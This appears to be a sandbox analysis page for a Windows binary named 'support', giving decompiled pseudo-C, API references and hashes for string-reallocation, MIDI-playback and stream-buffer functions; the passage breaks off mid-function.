0x003bc816
0x003bc81e
0x003bc81e
0x003bc823
0x003bc82b
0x003bc832
0x003bc83d
0x003bc854
0x003bc854
0x003bc85b
0x003bc85b
0x003bc864
0x003bc866
0x003bc866
0x003bc869
0x003bc871
0x003bc873
0x003bc876
0x003bc881
0x003bc883
0x003bc883
0x003bc881
0x003bc889
0x003bc88b
0x003bc890
0x003bc890
0x003bc893
0x003bc899
0x003bc8a3
0x003bc8ad
0x003bc8b0
0x003bc8b7
0x003bc8b7
0x003bc8b9
0x003bc8ba
0x003bc8c6
0x003bc8ce
0x003bc8d3
0x003bc8df
0x003bc8ee
0x003bc8fc
0x003bc8fd
0x003bc904
0x003bc90b
0x003bc913
0x003bc916
0x003bc91b
0x003bc924
0x003bc926
0x003bc92c
0x003bc92d
0x003bc935
0x003bc937
0x003bc93a
0x003bc945
0x003bc947
0x003bc947
0x003bc945
0x003bc94d
0x003bc94f
0x003bc954
0x003bc95c
0x003bc974
0x003bc974
0x003bc840
0x003bc844
0x003bc848
0x003bc852
0x00000000
0x00000000
0x00000000
0x003bc852
0x00000000
0x003bc840

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,4B5EE95B,76C86490,73413D00), ref: 003BC77E
memset.VCRUNTIME140(?,00000000,00000100,?,?), ref: 003BC7F2
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?), ref: 003BC883
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,?,?,?), ref: 003BC947

Strings

[^K/, xrefs: 003BC747

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$FileModuleNamememset
String ID: [^K/
API String ID: 1148551519-4166871755
Opcode ID: e7da80b5fd16844d6a932003ed8b2200bcf38babcd89189c3eb433cab4c42939
Instruction ID: 45ad1b080159c7f4d6e6de6fd9a6dc791d28addc4d177e3209591fc3a0538142
Opcode Fuzzy Hash: e7da80b5fd16844d6a932003ed8b2200bcf38babcd89189c3eb433cab4c42939
Instruction Fuzzy Hash: A651E4359102288FDB26CF28CC99BE9B7B4FB05308F1002E9E559A7682D7755E84CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 003B5DD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E003B5DD0(void* __ebx, void* __ecx, intOrPtr __edi, void* __esi, void* _a4) {
				signed int _v8;
				void* _v12;
				intOrPtr _v20;
				char _v40;
				void* _t36;
				signed int _t41;
				intOrPtr _t45;
				void* _t58;
				void* _t61;
				void* _t62;
				void* _t63;
				intOrPtr _t65;
				void* _t67;
				signed int _t74;
				intOrPtr* _t75;
				intOrPtr* _t76;
				unsigned int _t81;
				void* _t86;
				signed int _t87;
				void* _t88;
				void* _t89;
				void* _t93;
				signed int _t95;
				void* _t97;
				void* _t100;
				signed int _t106;
				void* _t111;
				void* _t113;

				_t91 = __edi;
				_t67 = _a4;
				_t100 = __ecx;
				_t36 =  *((intOrPtr*)(__ecx + 0x10));
				_v12 = _t36;
				if(_t36 > _t67) {
					L28:
					return _t36;
				} else {
					_t87 =  *(__ecx + 0x14);
					_v8 = _t87;
					_t111 = _t87 - _t67;
					if(_t111 == 0) {
						goto L28;
					} else {
						_push(__edi);
						if(_t111 >= 0) {
							if(_t67 >= 0x10 || _t87 < 0x10) {
								L27:
								goto L28;
							} else {
								_t93 =  *__ecx;
								_t38 = memcpy(__ecx, _t93, _t36 + 1);
								_t106 = _t106 + 0xc;
								_t74 =  *((intOrPtr*)(_t100 + 0x14)) + 1;
								if(_t74 < 0x1000) {
									L26:
									_push(_t74);
									_t36 = E003BE78C(_t38, _t93);
									 *((intOrPtr*)(_t100 + 0x14)) = 0xf;
									goto L27;
								} else {
									_t88 =  *(_t93 - 4);
									_t74 = _t74 + 0x23;
									_t91 = _t93 - _t88;
									_t38 = _t91 - 4;
									if(_t91 - 4 > 0x1f) {
										goto L29;
									} else {
										_t93 = _t88;
										goto L26;
									}
								}
							}
						} else {
							_t74 = _t67 - _t36;
							if(0x7fffffff - _v12 < _t74) {
								L30:
								L003B5DC0(_t67, _t74, _t91, _t100);
								asm("int3");
								asm("int3");
								__imp__?_Xlength_error@std@@YAXPBD@Z("vector<T> too long");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								asm("int3");
								_push(0xffffffff);
								_push(E003BF3D0);
								_push( *[fs:0x0]);
								_t41 =  *0x3c500c; // 0x4b5ee95b
								_push(_t41 ^ _t106);
								 *[fs:0x0] =  &_v40;
								_t75 =  *_t74;
								_t45 =  *((intOrPtr*)( *_t75 + 4));
								_t76 =  *((intOrPtr*)(_t45 + _t75 + 0x38));
								if(_t76 != 0) {
									_t45 =  *((intOrPtr*)( *_t76 + 8))();
								}
								 *[fs:0x0] = _v20;
								return _t45;
							} else {
								_t95 = _t67 | 0x0000000f;
								_t113 = _t95 - 0x7fffffff;
								if(_t113 <= 0) {
									_t81 = _t87 >> 1;
									if(_t87 <= 0x7fffffff - _t81) {
										_t91 =  <  ? _t81 + _t87 : _t95;
									} else {
										_t91 = 0x7fffffff;
									}
								} else {
									_t91 = 0x7fffffff;
								}
								_t74 =  ~(0 | _t113 > 0x00000000) | _t91 + 0x00000001;
								if(_t74 < 0x1000) {
									if(_t74 == 0) {
										_t67 = 0;
									} else {
										_push(_t74);
										_t62 = E003BE3E1();
										_t87 = _v8;
										_t106 = _t106 + 4;
										_t67 = _t62;
									}
									goto L15;
								} else {
									_t10 = _t74 + 0x23; // 0x23
									_t63 = _t10;
									_t64 =  <=  ? _t87 | 0xffffffff : _t63;
									_push( <=  ? _t87 | 0xffffffff : _t63);
									_t65 = E003BE3E1();
									_t106 = _t106 + 4;
									if(_t65 == 0) {
										L29:
										__imp___invalid_parameter_noinfo_noreturn();
										goto L30;
									} else {
										_t87 = _v8;
										_t12 = _t65 + 0x23; // 0x23
										_t67 = _t12 & 0xffffffe0;
										 *((intOrPtr*)(_t67 - 4)) = _t65;
										L15:
										 *(_t100 + 0x10) = _a4;
										 *((intOrPtr*)(_t100 + 0x14)) = _t91;
										_push(_v12 + 1);
										if(_t87 < 0x10) {
											memcpy(_t67, _t100, ??);
											_t58 = _v12;
											 *_t100 = _t67;
											 *(_t100 + 0x10) = _t58;
											return _t58;
										} else {
											_t97 =  *_t100;
											_t59 = memcpy(_t67, _t97, ??);
											_t106 = _t106 + 0xc;
											_t86 = _v8 + 1;
											if(_t86 < 0x1000) {
												L19:
												_push(_t86);
												E003BE78C(_t59, _t97);
												_t61 = _v12;
												 *_t100 = _t67;
												 *(_t100 + 0x10) = _t61;
												return _t61;
											} else {
												_t89 =  *(_t97 - 4);
												_t74 = _t86 + 0x23;
												_t91 = _t97 - _t89;
												_t59 = _t91 - 4;
												if(_t91 - 4 > 0x1f) {
													goto L29;
												} else {
													_t97 = _t89;
													goto L19;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}

0x003b5dd0
0x003b5dd7
0x003b5ddb
0x003b5ddd
0x003b5de0
0x003b5de5
0x003b5f5b
0x003b5f60
0x003b5deb
0x003b5deb
0x003b5dee
0x003b5df1
0x003b5df3
0x00000000
0x003b5df9
0x003b5df9
0x003b5dfa
0x003b5f16
0x003b5f5a
0x00000000
0x003b5f1d
0x003b5f1d
0x003b5f23
0x003b5f2b
0x003b5f2e
0x003b5f35
0x003b5f49
0x003b5f49
0x003b5f4b
0x003b5f53
0x00000000
0x003b5f37
0x003b5f37
0x003b5f3a
0x003b5f3d
0x003b5f3f
0x003b5f45
0x00000000
0x003b5f47
0x003b5f47
0x00000000
0x003b5f47
0x003b5f45
0x003b5f35
0x003b5e00
0x003b5e02
0x003b5e0e
0x003b5f69
0x003b5f69
0x003b5f6e
0x003b5f6f
0x003b5f75
0x003b5f7b
0x003b5f7c
0x003b5f7d
0x003b5f7e
0x003b5f7f
0x003b5f83
0x003b5f85
0x003b5f90
0x003b5f91
0x003b5f98
0x003b5f9c
0x003b5fa2
0x003b5fa6
0x003b5fa9
0x003b5faf
0x003b5fb3
0x003b5fb3
0x003b5fb9
0x003b5fc4
0x003b5e14
0x003b5e16
0x003b5e19
0x003b5e1f
0x003b5e2f
0x003b5e35
0x003b5e43
0x003b5e37
0x003b5e37
0x003b5e37
0x003b5e21
0x003b5e21
0x003b5e21
0x003b5e52
0x003b5e5a
0x003b5e88
0x003b5e9a
0x003b5e8a
0x003b5e8a
0x003b5e8b
0x003b5e90
0x003b5e93
0x003b5e96
0x003b5e96
0x00000000
0x003b5e5c
0x003b5e5c
0x003b5e5c
0x003b5e64
0x003b5e67
0x003b5e68
0x003b5e6d
0x003b5e72
0x003b5f63
0x003b5f63
0x00000000
0x003b5e78
0x003b5e78
0x003b5e7b
0x003b5e7e
0x003b5e81
0x003b5e9c
0x003b5e9f
0x003b5ea6
0x003b5ea9
0x003b5ead
0x003b5efa
0x003b5eff
0x003b5f05
0x003b5f07
0x003b5f10
0x003b5eaf
0x003b5eaf
0x003b5eb3
0x003b5ebb
0x003b5ebe
0x003b5ec5
0x003b5edd
0x003b5edd
0x003b5edf
0x003b5ee4
0x003b5eea
0x003b5eec
0x003b5ef5
0x003b5ec7
0x003b5ec7
0x003b5eca
0x003b5ecd
0x003b5ecf
0x003b5ed5
0x00000000
0x003b5edb
0x003b5edb
0x00000000
0x003b5edb
0x003b5ed5
0x003b5ec5
0x003b5ead
0x003b5e72
0x003b5e5a
0x003b5e0e
0x003b5dfa
0x003b5df3

APIs

memcpy.VCRUNTIME140(00000000,?,?,?,006F5B9C), ref: 003B5EB3
memcpy.VCRUNTIME140(00000000,?,?,?,006F5B9C), ref: 003B5EFA

Part of subcall function 003BE3E1: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(006F5B9C,?,003B5E90,00000000,?,006F5B9C), ref: 003BE3F6

memcpy.VCRUNTIME140(?,?,?,?,006F5B9C), ref: 003B5F23
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,006F5B9C), ref: 003B5F63

Strings

string too long, xrefs: 003B5DC0

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnmalloc
String ID: string too long
API String ID: 996696-2556327735
Opcode ID: 5d551e339cb31869f9dbe3f2726921be1f6ed6293fe16b3518f0db2df0e0ccda
Instruction ID: 2a7a23291df8347fd41ca1c5c51474bac1546dd3f5e86dbf0acdf974e58e3691
Opcode Fuzzy Hash: 5d551e339cb31869f9dbe3f2726921be1f6ed6293fe16b3518f0db2df0e0ccda
Instruction Fuzzy Hash: 3041F7727106049FC72ADE38D8C1AEEB7E5EB84318B240B3DE65AC7A81DB30DA558751

Uniqueness

Uniqueness Score: -1.00%

Function 003B8EE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E003B8EE0(void* __ebx, long __ecx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				long _v20;
				long _v24;
				signed int _t52;
				int _t57;
				struct midihdr_tag _t62;
				intOrPtr _t63;
				void* _t69;
				int _t73;
				HMIDISTRM* _t88;
				long _t89;
				signed int _t96;
				int _t103;
				int _t107;
				intOrPtr* _t114;
				intOrPtr* _t116;
				signed int _t117;
				void* _t118;

				_t89 = __ecx;
				_t52 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t52 ^ _t117;
				_t114 = __ecx;
				_v24 = 0;
				_t88 = __ecx + 0x1c;
				if( *(__ecx + 0x1c) != 0) {
					L4:
					_t116 = _t114 + 0x74;
					E003B9340(_t116, _t89, _t116);
					_v12 =  *((intOrPtr*)(_t114 + 0x14));
					_v16 = 8;
					_t57 = midiStreamProperty( *_t88,  &_v16, 0x80000001);
					if(_t57 != 0) {
						goto L2;
					} else {
						 *(_t114 + 0x48) = _t57;
						_v20 = 1;
						 *(_t114 + 0x40) = _t57;
						asm("o16 nop [eax+eax]");
						while(1) {
							_push(0x400);
							 *((intOrPtr*)(_t57 * 0x54 +  *_t116 + 4)) = 0x400;
							_t62 = E003BE911();
							_t118 = _t118 + 4;
							 *( *(_t114 + 0x40) * 0x54 +  *_t116) = _t62;
							_t96 =  *(_t114 + 0x40) * 0x54;
							_t63 =  *_t116;
							if( *((intOrPtr*)(_t96 + _t63)) == 0) {
								goto L3;
							}
							 *(_t96 + _t63 + 0x40) = 0;
							 *((intOrPtr*)( *(_t114 + 0x40) * 0x54 +  *_t116 + 0x44)) = 0x400;
							 *( *(_t114 + 0x40) * 0x54 +  *_t116 + 0x4c) = 0;
							 *( *(_t114 + 0x40) * 0x54 +  *_t116 + 0x50) = 0;
							_t69 = E003B8760(_t114, _v20,  *(_t114 + 0x40) * 0x54 +  *_t116);
							if(_t69 == 0) {
								L10:
								 *(_t114 + 0x40) * 0x54 +  *_t116->dwBytesRecorded =  *( *(_t114 + 0x40) * 0x54 +  *_t116 + 0x48);
								if( *(_t114 + 0x3c) != 0) {
									L12:
									_t73 = midiStreamOut( *_t88,  *(_t114 + 0x40) * 0x54 +  *_t116, 0x40);
									_t103 = _t73;
									if(_t103 != 0) {
										 *((intOrPtr*)( *_t114 + 4))(_t103);
										goto L18;
									} else {
										_v20 = _t73;
										if(_v24 != _t73) {
											L18:
											 *(_t114 + 0x3c) = 1;
											 *(_t114 + 0x40) = 0;
											return E003BE3D0(_v8 ^ _t117);
										} else {
											_t57 =  *(_t114 + 0x40) + 1;
											 *(_t114 + 0x40) = _t57;
											if(_t57 < 2) {
												continue;
											} else {
												goto L18;
											}
										}
									}
								} else {
									_t107 = midiOutPrepareHeader( *_t88,  *(_t114 + 0x40) * 0x54 +  *_t116, 0x40);
									if(_t107 != 0) {
										 *((intOrPtr*)( *_t114 + 4))(_t107);
										return E003BE3D0(_v8 ^ _t117);
									} else {
										goto L12;
									}
								}
							} else {
								if(_t69 != 0xffffff99) {
									goto L3;
								} else {
									_v24 = 1;
									goto L10;
								}
							}
							goto L19;
						}
						goto L3;
					}
				} else {
					_t57 = midiStreamOpen(_t88, __ecx + 0x44, 1, E003B9210, __ecx, 0x30000);
					if(_t57 == 0) {
						goto L4;
					} else {
						L2:
						 *((intOrPtr*)( *_t114 + 4))(_t57);
						L3:
						return E003BE3D0(_v8 ^ _t117);
					}
				}
				L19:
			}

0x003b8ee0
0x003b8ee6
0x003b8eed
0x003b8ef3
0x003b8ef5
0x003b8f00
0x003b8f03
0x003b8f3c
0x003b8f3c
0x003b8f43
0x003b8f4b
0x003b8f59
0x003b8f60
0x003b8f68
0x00000000
0x003b8f6a
0x003b8f6a
0x003b8f6d
0x003b8f74
0x003b8f77
0x003b8f80
0x003b8f85
0x003b8f8a
0x003b8f92
0x003b8f9b
0x003b8fa0
0x003b8fa3
0x003b8fa7
0x003b8fad
0x00000000
0x00000000
0x003b8fb3
0x003b8fc1
0x003b8fcf
0x003b8fdd
0x003b8ff1
0x003b8ff8
0x003b900a
0x003b9013
0x003b901a
0x003b9033
0x003b903e
0x003b9044
0x003b9048
0x003b9084
0x00000000
0x003b904a
0x003b904a
0x003b9050
0x003b9087
0x003b908f
0x003b9098
0x003b90aa
0x003b9052
0x003b9055
0x003b9056
0x003b905c
0x00000000
0x003b9062
0x00000000
0x003b9062
0x003b905c
0x003b9050
0x003b901c
0x003b902d
0x003b9031
0x003b9069
0x003b907e
0x00000000
0x00000000
0x00000000
0x003b9031
0x003b8ffa
0x003b8ffd
0x00000000
0x003b9003
0x003b9003
0x00000000
0x003b9003
0x003b8ffd
0x00000000
0x003b8ff8
0x00000000
0x003b8f80
0x003b8f05
0x003b8f17
0x003b8f1f
0x00000000
0x003b8f21
0x003b8f21
0x003b8f26
0x003b8f29
0x003b8f3b
0x003b8f3b
0x003b8f1f
0x00000000

APIs

midiStreamOpen.WINMM(00000000,FFFFFFFF,00000001,003B9210,?,00030000,?,-0000005C,-00000006), ref: 003B8F17
midiStreamProperty.WINMM(00000000,?,80000001,?,00000000,?,-0000005C,-00000006), ref: 003B8F60
midiOutPrepareHeader.WINMM(00000000,00000000,00000040,00000001,00000000), ref: 003B9027
midiStreamOut.WINMM(00000000,00000000,00000040,00000001,00000000), ref: 003B903E

Strings

[^K/, xrefs: 003B8EE6

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: midi$Stream$HeaderOpenPrepareProperty
String ID: [^K/
API String ID: 2061886437-4166871755
Opcode ID: a3edf3ea702d38c5f50141cd5508713ce845e8ce3fd3141ae4093eb6c12a7e55
Instruction ID: dcc7dc79b135fc35525de0efa6227d96e1bcf200af23fe00f549a4dad11ea393
Opcode Fuzzy Hash: a3edf3ea702d38c5f50141cd5508713ce845e8ce3fd3141ae4093eb6c12a7e55
Instruction Fuzzy Hash: A6515DB0600105AFDB29DF68D885BA9FBE9FF44308F10016EE706CBA91D772E955CB91

Uniqueness

Uniqueness Score: -1.00%

Function 003BDC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E003BDC30(void* __ebx, void* __ecx, void* __edi, void* __esi, char _a4) {
				signed int _v8;
				char _v40;
				char _v41;
				char _v48;
				char _v52;
				signed int _t34;
				void* _t47;
				int _t50;
				void* _t52;
				char _t61;
				signed int _t65;
				signed int _t68;
				intOrPtr _t72;
				void* _t82;
				intOrPtr* _t84;
				int _t86;
				void* _t90;
				signed int _t91;

				_t82 = __edi;
				_t34 =  *0x3c500c; // 0x4b5ee95b
				_v8 = _t34 ^ _t91;
				_t61 = _a4;
				_t90 = __ecx;
				if(_t61 != 0xffffffff) {
					_t37 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x20))));
					if(_t37 == 0 || _t37 >=  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x30)))) + _t37) {
						_push(_t82);
						if( *(_t90 + 0x4c) == 0) {
							L19:
							return E003BE3D0(_v8 ^ _t91);
						} else {
							_t84 =  *((intOrPtr*)(_t90 + 0xc));
							if( *_t84 == _t90 + 0x3c) {
								_t72 =  *((intOrPtr*)(_t90 + 0x50));
								 *_t84 = _t72;
								 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x1c)))) = _t72;
								 *((intOrPtr*)( *((intOrPtr*)(_t90 + 0x2c)))) =  *((intOrPtr*)(_t90 + 0x54)) - _t72;
							}
							_t65 =  *(_t90 + 0x38);
							if(_t65 != 0) {
								_v41 = _t61;
								_t37 = _t90 + 0x40;
								__imp__?out@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PBD1AAPBDPAD3AAPAD@Z(_t37,  &_v41,  &_v40,  &_v52,  &_v40,  &_v8,  &_v48);
								if(_t37 < 0) {
									goto L19;
								} else {
									if(_t37 <= 1) {
										_t47 =  &_v40;
										_t86 = _v48 - _t47;
										if(_t86 == 0 || _t86 == fwrite(_t47, 1, _t86,  *(_t90 + 0x4c))) {
											_t37 =  &_v41;
											 *((char*)(_t90 + 0x3d)) = 1;
											if(_v52 ==  &_v41) {
												goto L19;
											} else {
												return E003BE3D0(_v8 ^ _t91);
											}
										} else {
											goto L19;
										}
									} else {
										if(_t37 != 3) {
											goto L19;
										} else {
											_t50 = _v41;
											goto L14;
										}
									}
								}
							} else {
								_t50 = _t61;
								L14:
								fputc(_t50,  *(_t90 + 0x4c));
								_t68 = _t65 | 0xffffffff;
								_t69 =  !=  ? _t61 : _t68;
								_t52 =  !=  ? _t61 : _t68;
								return E003BE3D0(_v8 ^ _t91);
							}
						}
					} else {
						__imp__?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ();
						 *_t37 = _t61;
						return E003BE3D0(_v8 ^ _t91);
					}
				} else {
					return E003BE3D0(_v8 ^ _t91);
				}
			}

0x003bdc30
0x003bdc36
0x003bdc3d
0x003bdc41
0x003bdc45
0x003bdc4a
0x003bdc63
0x003bdc67
0x003bdc94
0x003bdc95
0x003bdd65
0x003bdd78
0x003bdc9b
0x003bdc9b
0x003bdca3
0x003bdca8
0x003bdcad
0x003bdcb2
0x003bdcb7
0x003bdcb7
0x003bdcb9
0x003bdcbe
0x003bdcc8
0x003bdce0
0x003bdce4
0x003bdcec
0x00000000
0x003bdcee
0x003bdcf1
0x003bdd29
0x003bdd2c
0x003bdd2e
0x003bdd44
0x003bdd47
0x003bdd4e
0x00000000
0x003bdd50
0x003bdd62
0x003bdd62
0x00000000
0x00000000
0x00000000
0x003bdcf3
0x003bdcf6
0x00000000
0x003bdcf8
0x003bdcf8
0x00000000
0x003bdcf8
0x003bdcf6
0x003bdcf1
0x003bdcc0
0x003bdcc0
0x003bdcfc
0x003bdd00
0x003bdd09
0x003bdd0e
0x003bdd13
0x003bdd23
0x003bdd23
0x003bdcbe
0x003bdc74
0x003bdc74
0x003bdc7b
0x003bdc8d
0x003bdc8d
0x003bdc4d
0x003bdc5d
0x003bdc5d

APIs

?_Pninc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEPADXZ.MSVCP140 ref: 003BDC74

Strings

[^K/, xrefs: 003BDC36

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: D@std@@@std@@Pninc@?$basic_streambuf@U?$char_traits@
String ID: [^K/
API String ID: 3551493264-4166871755
Opcode ID: cb05a609724d316759cb7e505a2eaaf7171f9c8ffd1ef11b10f97b384a53cbac
Instruction ID: 7ba88f2834e89ed34c46676ee79ee8e9203bfdde8d5596ad4bc2ce633fb68bb2
Opcode Fuzzy Hash: cb05a609724d316759cb7e505a2eaaf7171f9c8ffd1ef11b10f97b384a53cbac
Instruction Fuzzy Hash: 0B4184326001089FCB21DFA8D8819EEB7F8FF59314B11466FE647D7640EA71E914CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 003B5AF0 Relevance: 7.6, APIs: 5, Instructions: 140
COMMON

Download Yara Rule

C-Code - Quality: 15%

			E003B5AF0(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4, void* _a12, int _a16) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v36;
				void* __esi;
				void* _t46;
				intOrPtr _t47;
				signed int _t55;
				unsigned int _t57;
				void* _t73;
				void* _t74;
				intOrPtr _t76;
				intOrPtr _t83;
				intOrPtr* _t84;
				signed int _t89;
				void* _t91;
				signed int _t92;
				intOrPtr _t93;
				void* _t94;
				signed int _t97;
				void* _t99;
				intOrPtr _t104;
				intOrPtr* _t105;
				intOrPtr* _t107;
				signed int _t110;
				void* _t111;
				void* _t113;
				void* _t116;
				void* _t118;
				void* _t123;

				_push(__ebx);
				_t78 = __ecx;
				_v20 = _a12;
				_t92 =  *(__ecx + 0x10);
				_t104 = _a4;
				_v8 = _t92;
				_push(__edi);
				if(0x7fffffff - _t92 < _t104) {
					_t46 = L003B5DC0(__ecx, 0x7fffffff, __edi, _t104);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_t116 = _t118;
					_push(__edi);
					_t97 = _t92;
					if(0x7fffffff == _t97) {
						L29:
						return _t46;
					} else {
						_push(_t104);
						_t105 = 0x80000017;
						do {
							_t83 =  *_t105;
							if(_t83 < 0x10) {
								goto L27;
							} else {
								_t47 =  *((intOrPtr*)(_t105 - 0x14));
								_t84 = _t83 + 1;
								if(_t84 < 0x1000) {
									L26:
									_push(_t84);
									E003BE78C(_t47, _t47);
									_t118 = _t118 + 8;
									goto L27;
								} else {
									_t93 =  *((intOrPtr*)(_t47 - 4));
									_t84 = _t84 + 0x23;
									if(_t47 - _t93 + 0xfffffffc > 0x1f) {
										__imp___invalid_parameter_noinfo_noreturn();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t107 = _t84;
										asm("xorps xmm0, xmm0");
										 *_t107 = 0x3c13f8;
										asm("movq [eax], xmm0");
										__imp____std_exception_copy(_v36 + 4, _t107 + 4, _t105, _t116);
										 *_t107 = 0x3c14c0;
										return _t107;
									} else {
										_t47 = _t93;
										goto L26;
									}
								}
							}
							goto L31;
							L27:
							 *((intOrPtr*)(_t105 - 4)) = 0;
							 *_t105 = 0xf;
							 *((char*)(_t105 - 0x14)) = 0;
							_t105 = _t105 + 0x1c;
							_t40 = _t105 - 0x18; // 0xc9c314
							_t46 = _t40;
						} while (_t46 != _t97);
						goto L29;
					}
				} else {
					_t99 =  *(__ecx + 0x14);
					_t55 = _t92 + _t104;
					_v12 = _t55;
					_t110 = _t55 | 0x0000000f;
					_v16 = _t99;
					_t123 = _t110 - 0x7fffffff;
					if(_t123 <= 0) {
						_t57 = _t99 >> 1;
						if(_t99 <= 0x7fffffff - _t57) {
							_t111 =  <  ? _t99 + _t57 : _t110;
						} else {
							_t111 = 0x7fffffff;
						}
					} else {
						_t111 = 0x7fffffff;
					}
					_t89 =  ~(0 | _t123 > 0x00000000) | _t111 + 0x00000001;
					if(_t89 < 0x1000) {
						if(_t89 == 0) {
							_t99 = 0;
						} else {
							_push(_t89);
							_t73 = E003BE3E1();
							_t92 = _v8;
							_t118 = _t118 + 4;
							_t99 = _t73;
						}
						goto L12;
					} else {
						_t12 = _t89 + 0x23; // 0x23
						_t74 = _t12;
						_t75 =  <=  ? _t92 | 0xffffffff : _t74;
						_push( <=  ? _t92 | 0xffffffff : _t74);
						_t76 = E003BE3E1();
						_t118 = _t118 + 4;
						if(_t76 == 0) {
							L17:
							__imp___invalid_parameter_noinfo_noreturn();
							goto L18;
						} else {
							_t92 = _v8;
							_t14 = _t76 + 0x23; // 0x23
							_t99 = _t14 & 0xffffffe0;
							 *((intOrPtr*)(_t99 - 4)) = _t76;
							L12:
